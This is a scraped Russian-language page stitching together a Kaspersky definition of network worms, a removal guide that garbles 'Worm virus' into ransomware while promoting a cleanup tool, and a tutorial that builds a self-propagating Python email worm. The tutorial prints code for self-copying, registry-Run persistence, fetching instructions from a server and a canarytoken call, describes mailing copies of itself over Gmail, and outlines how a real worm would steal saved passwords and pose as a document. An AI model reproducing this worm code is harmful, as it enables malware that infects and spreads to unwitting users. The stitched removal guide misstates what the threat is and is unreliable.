Worm программа что это

Содержание

Размножается в компьютерных сетях через сетевые ресурсы или съемные носители. В отличие от Net-Worm, чтобы Worm активировался, пользователь должен запустить его.

Черви этого типа ищут в сети удаленные компьютеры и копируют себя в каталоги, открытые на чтение и запись (если такие обнаружены). При этом такие черви или перебирают доступные сетевые каталоги, используя функции операционной системы, и/или случайным образом ищут компьютеры в интернете, подключаются к ним и пытаются открыть их диски для полного доступа.

Также к данному типу червей относятся черви, которые по тем или иным причинам нельзя отнести ни к одному из вышеописанных классов (например, мобильные черви).

Источник: threats.kaspersky.com

Как удалить Worm virus: Полное руководство

Worm virus — вредоносная программа, которая шифрует личные документы на компьютере пользователя. Эта ransomware выводит сообщение, предлагающее расшифровать всю информацию за деньги. Инструкции по расшифровке появляются на рабочем столе зараженного ПК.

Как один студент сломал интернет?! Кто такие Сетевые Черви и почему они опасны? Червь Морриса.

Worm virus считается шифровальщиком файлов, ограничивающим доступ к документам, изображениям, видео. Вирус шифрует файлы, а затем вымогает деньги у жертв. Ransomware проникает на все версии Windows. Во время запуска исполняемый файл начинает сканировать все диски на ПК, чтобы найти необходимые данные для шифрования.

Кроме того, инфекция удаляет все теневые копии томов, чтобы пользователь не мог использовать их для восстановления данных.

Как Worm virus попало на мой ПК?

Распространение Worm virus происходит чаще всего через спам, содержащийся в зараженных вложениях, а также с помощью вирусных программ в операционной системе.

Примеры попадания Worm virus на компьютер:

  • Киберпреступники отправляют электронное письмо, которое имеет поддельные заголовки и сплошной обман в контексте. Например, в письме может говориться об акциях от транспортных компаний или о том, что они пытались доставить посылку пользователю, но по каким-то причинам не смогли этого сделать. Часто письма утверждают, что это просто уведомления об отправке заказанных отправлений. Человек не может устоять перед любопытством и открывает такое письмо с вложенным в него файлом или ссылкой. В результате ПК мгновенно заражается Worm virus.
  • Worm virus атакует жертв, находя уязвимости в программном обеспечении компьютера, в его операционной системе, браузерах, сторонних приложениях и т.д.

Как удалить Worm virus? Пошаговое руководство

Вот полное руководство, которое поможет избавиться от Worm virus на вашем компьютере. Наиболее эффективным способом является использование проверенного автоматического инструмента, такого как AVarmor

Вы должны понимать, что если вы хотите удалить Worm virus и уже начали процесс удаления, вы рискуете потерять все имеющиеся у вас файлы, потому что нет никакой гарантии, что вы сможете их восстановить. Пользовательские данные могут быть полностью повреждены, если вы вручную удалите инфекцию или восстановите зашифрованные файлы.

P2P-Worm.Win32.Palevo: что такое черви и почему не стоит забывать о старых вирусах

Однако вы можете попробовать решить все проблемы в режиме ручного удаления. Давайте разберемся в этом более подробно.

Важная информация

К сожалению, восстановить файлы, зашифрованные программой Worm virus, невозможно. Это связано с тем, что закрытый ключ, который необходим для разблокировки зашифрованных файлов, доступен только киберпреступникам.

Читайте также:
Oracle java что это за программа

Ни в коем случае не платите никаких денег за восстановление ваших файлов. Даже заплатив выкуп, нет никакой гарантии, что преступники предоставят вам доступ к файлам.

Прежде всего, необходимо убедиться, что вредоносная программа удалена из системы ПК, так как она блокирует систему и шифрует файлы, если остается в системе.

Проблема с доступом к зашифрованным файлам существует и сегодня, но антивирусные компании, наряду с хакерами, периодически выпускают дескрипторы — ключи к заблокированным файлам. Поэтому еще одним вариантом выхода из ситуации может стать появление необходимого дескриптора. Перед получением ключа пользователю следует сохранить файлы.

Дескриптор — это систематизация основных параметров вируса в закодированном виде (символы, начинающиеся с заглавной латинской буквы, маленькие латинские буквы и цифры).

Метод 1: Удалить Worm virus с AVarmor

AVarmor — это инструмент, который удаляет вредоносное ПО. Утилита помогает пользователям удалять с компьютеров ransomware типа Worm virus и различные вредоносные программы. Утилита имеет простой и удобный интерфейс, а также мощные механизмы для защиты всей системы вашего ПК.

  1. Скачайте и установите AVarmor.
  2. После завершения процесса загрузки запустите утилиту, согласившись с ее настройками. Перед этим необходимо закрыть все посторонние программы на вашем компьютере.
  3. Утилита начнет свою работу, и пользователю необходимо нажать кнопку «Сканировать» на наличие вредоносного ПО.
  4. После завершения сканирования будет сформирован список найденных опасных объектов.
  5. Удалить все найденные угрозы.
  6. После завершения очистки перезагрузите компьютер.

Метод 2: Подключите компьютер к сети и войдите в безопасный режим

Сначала попробуйте загрузить компьютер в безопасном режиме. Это поможет вам предотвратить запуск Worm virus.

Windows 7, 10, Vista, XP

  1. Сначала выполните перезагрузку компьютера.
  2. Нажмите F8 до появления Windows.
  3. Вы увидите меню дополнительных опций.
  4. Перейдите в «Безопасный режим с подключением к сети»
  5. Нажмите Enter.

Windows 8, Windows 8.1

  1. Нажмите Windows+R, чтобы вызвать окно RUN.
  2. Введите команду msconfig.
  3. Нажмите OK.
  4. Перейдите на вкладку Boot.
  5. В этой области выберите опции Safe Boot и Networking.
  6. Нажмите OK.
  7. Перезагрузите компьютер.

Итог

Статья Изучаем принцип работы сетевого червя на Python

Приветствую!
Пытался придумать вводную — не получилось. Да и оно вам надо? Так что, давайте вкратце: в этой статье мы разберем такой тип вирусов, как «сетевой червь» и даже напишем одного такого.

Итак, что же такое, эти ваши сетевые черви?

Если поискать на википедии, то можно найти следующее определение: «Сетевой червь — разновидность

Ссылка скрыта от гостей
, самостоятельно распространяющейся через локальные и глобальные (
Ссылка скрыта от гостей

) компьютерные сети.» и, в принципе, все верно, сетевой червь — это действительно вредоносная программа, способная воспроизводить себя на устройствах, распространяющаяся по сетевым каналам и часто, способная к самостоятельному преодолению систем защиты компьютерных сетей. При этом пользователь не подозревает о заражении своего компьютера.

Распространятся по сети черви могут, отправляя свои копии по электронной почте, или заражая устройства, используя критические уязвимости систем (например, такие, как, знаменитая, закрытая уже Eternal Blue). Сетевые черви могут размножаться по каналам файлообменных пиринговых (p2p) сетей (например, Kazaa, Grokster, eDonkey, FastTrack, Gnutella и др.), в системах мгновенного обмена сообщениями (таких как Facebook Messenger, Skype или WhatsApp) и даже, через наше любимую, «безопасную» IRC.

Принцип работы сетевого червя довольно прост — вредоносная программа попадает на устройство, закрепляется там, выполняет вредоносные действия, если есть такая задача и распространяется дальше.

Ну что ж, предлагаю создать одного такого представителя, данного семейства вирусов.

!ВАЖНО! Прошу обратить внимание, что т.к. материал в статье представлен исключительно в образовательных целях, созданный нами червь не будет выполнять никаких вредоносных действий, не будет прятаться на зараженном устройстве и маскировать себя при распространении и самовоспроизведении (например выдавая себя за документ). И вообще, создание вредоносных программ — плохо и можно за это понести ответственность, согласно

Читайте также:
Мы revo group что за программа

Ссылка скрыта от гостей

, или другой страны, в которой вы проживаете.

Для начала, давайте уточним язык программирования, на котором будем творить. Я, естественно буду использовать python3 (не зря же я в этой ветке тему создал, да?), т.к. я криворукий рукожоп и не могу нормально использовать другой яп он простой и наглядный, но если есть понимание, что программа делает, то и написать её на другом ЯПе не составит труда.

Теперь определимся, какие задачи будет выполнять наша программа, после заражения устройства (червь будет создан под устройства с ОС windows):
1. Создать свою копию на зараженном устройстве.
2. Записать себя в автозагрузку, через реестр.
3. Триггернуть canarytoken (чтоб нам на почту капнуло уведомление, о том, что червь засел на очередном устройстве)
4. Обратиться к серверу и получить от него какие-либо данные (инструкции). * В нашем случае червь будет получать список email-адресов для дальнейшей рассылки по ним своих копий
5. Выполнить какие-либо действия на зараженном устройстве.
6. Начать самораспространение, путем отправки своих копий, на ранее полученные email-адреса.

С задачами определились, можно и начинать кодить.
Для начала давайте импортируем нужные нам модули:

#!/usr/bin/env python # -*- coding: utf-8 -*- import os, sys import shutil import requests from winreg import OpenKey, SetValueEx, CloseKey, HKEY_CURRENT_USER, KEY_ALL_ACCESS, REG_SZ import smtplib from email.mime.multipart import MIMEMultipart from email.mime.base import MIMEBase from email.mime.application import MIMEApplication

Думаю, os, sys, requests — всем знакомы, на них останавливаться не будем. Модуль winreg предоставляет доступ к реестру Windows, smtplib и email — используются для создания электронной рассылки.
Если у вас отсутствует какой-либо модуль, его нужно установить используя команду:

pip install ‘название модуля’
pip3 install ‘название модуля’

Теперь решим первую задачу — самовоспроизведение. Заставим нашего червяка размножится вегетативно, так сказать:

def main(): # Создаем клона dir = os.getenv(«APPDATA») + r’/worm/’ # Вместо worm можно подставить любое название программы path = dir + os.path.basename(__file__) # тут будет копия программы, она же будет запускаться в дальнейшем if not os.path.exists(dir): # если директории не существует — создать и скопировать туда нашего червя os.makedirs(dir) # создание директории в appdata shutil.copy(__file__, path) # копирование программы

С этой частью — все должно быть ясно и проблем возникнуть не должно. Просто проверяем, есть ли уже наш червь на устройстве, если нет — то копируем его. Тут наш червь не прячется и копирует себя в том виде, в котором есть, со вполне очевидным названием.

Переходим ко второй задаче — прописываем червя в автозапуск, через реестр:

# прописываем в автозапуск, через реестр reestr_path = OpenKey(HKEY_CURRENT_USER, r’SOFTWAREMicrosoftWindowsCurrentVersionRun’, 0, KEY_ALL_ACCESS) SetValueEx(reestr_path, ‘worm’, 0, REG_SZ, path) CloseKey(reestr_path)

Готово, тут тоже все элементарно — определяем путь в реестре до автозапуска и создаем новую запись. Прошу отметить, что червяк не будет маскироваться под какую-нибудь системную утилиту, а имеет честное название «worm».

Теперь перейдем к пунктам 3 и 4 — тригернем канарейку и получим инструкции с сервера. Про то, как создать свой cannarytoken в интернете есть много информации, да и сам процесс создания не особо сложный, так что заострять внимание на этом не буду, если у кого-то возникнут вопросы — расскажу в следующий раз, что это, с чем это едят и как такое сделать.

Читайте также:
Что за программа битрикс

# Тригирим канарейку requests.get(‘http://canarytokens.com/feedback/01oohhr7cpup3uf0x44m0vol2/index.html’) # получчаем инструкции с сервера (в случае этой программы — получаем список почт, для рассылки) instructions = requests.get(‘http://192.168.3.111/instruction.txt’, stream=True) # получения файла с данными с сервера with open(‘instruction.txt’, ‘wb’) as f: shutil.copyfileobj(instructions.raw, f) # на всякий случай сохраняем инструкции

Обратите внимание, что, т.к. я не собираюсь заражать устройства в сторонних сетях, то мой сервер находится в той же сети, что и зараженное устройство. поднят он простейшим способом, при помощи питона и команды:

sudo python -m SimpleHTTPServer 80

В каталоге, который используется, как корневая директория сервера лежит заготовленный файл с инструкциями «instruction.txt», который и стягивает наш червь.

1645541901984.png

Так же, вместо своего сервера, можно использовать другие средства, например — гит-репозиторий, с которого червь будит тянуть то, что нам нужно.

Ну что ж, больше половины червяка готово, теперь перейдем к пункту 5 и напишем отдельную функцию, для выполнения зловредных и не очень действий:

def Execute(): «»»Функция для выполненя зловредных действий»»» with open(‘README.txt’, ‘w’, encoding=’utf-8′) as f: f.write(‘Belligerent worm in action’)

У нас, как понятно по коду, никаких вредоносных действий выполняться не будет, просто создастся файл «README.txt», но отдельная функция нужна, для наглядности, т.к. на самом деле в неё можно запихать целую кучу различных действий.

И вот мы наконец добрались до последнего 6 пункта — самораспространения. Напишем функцию, которая будет рассылать копии нашего червя на email-адреса, указанные в присланном ранее файле, с сервера:

В качестве почты, с которой червь будет производить рассылку, используется почта gmail. Сразу надо отметить, что в настройках аккаунта gogle надо открыть доступ к почте из ненадежных источников, иначе защита gmail не даст нам залогиниться и отправлять сообщения.

1645544287906.png

Вот и все, ребята, как говорится. Склеим нашего монстра Франкенштейна и проверим его работоспособность.
Код червя целиком:

Запускаем и проверяем:

1645544602114.png

Червь отработал, посмотрим, что же произошло:
В папке «AppData/Roaming» появился каталог «worm» с копией нашего червя.
До:

1645544747661.png

1645544760250.png

Появилась запись в реестре. Теперь при каждом запуске устройства, червь будет пытаться размножиться и выполнить то, для чего предназначался.
До:

1645544843515.png

1645544893523.png

Подключение к серверу прошло успешно, в каталоге, из которого производился запуск червя появился файл с инструкциями (стянутый с сервера) и README.txt (свидетельствующий об успешном выполнении функции Execute()):

1645545083649.png

1645545059004.png

Пришло сообщение о триггере канарейки

1645545225589.png

В «отправленных» появилось отправленное червем письмо:

1645545898341.png

В почтовом ящике эфемерной «жертвы» появилось письмо с вложенным червем:

1645545960963.png

1645546586717.png

Вложение скачивается без особых проблем и при запуске пользователем, червь будет активно выполнять заложенные в него функции, тем самым распространяясь все больше и больше.
P.S. Реальный такой червь, вместо получения списка email’ов с сервера мог бы вытягивать с устройства жертвы пароль от почты (если он сохранен, а многие такие вещи сохраняют в каких-нибудь, встроенных в браузер, парольных менеджерах), брать несколько последних адресов с которыми «жертва» вела переписку и отправлять свои копии им, притворяясь при этом каким-нибудь важным документом, кончено.

Ну и на последок, можно скомпилировать нашего червя в .exe файл при помощи pyinstaller и команды:
pyinstaller —onefile —icon=’иконка приложения.ico’ ‘название программы’

На этом — статья заканчивается, спасибо всем, кто нашел в себе силы дочитать до конца. Надеюсь, что такой вид вирусов, как «сетевые черви» были тут понятно разобраны и хоть кто-то нашел для себя что-то новое, или просто интереное.

Источник: codeby.net

Рейтинг
( Пока оценок нет )
Комментарии0
Загрузка ...
Похожие материалы
EFT-Soft.ru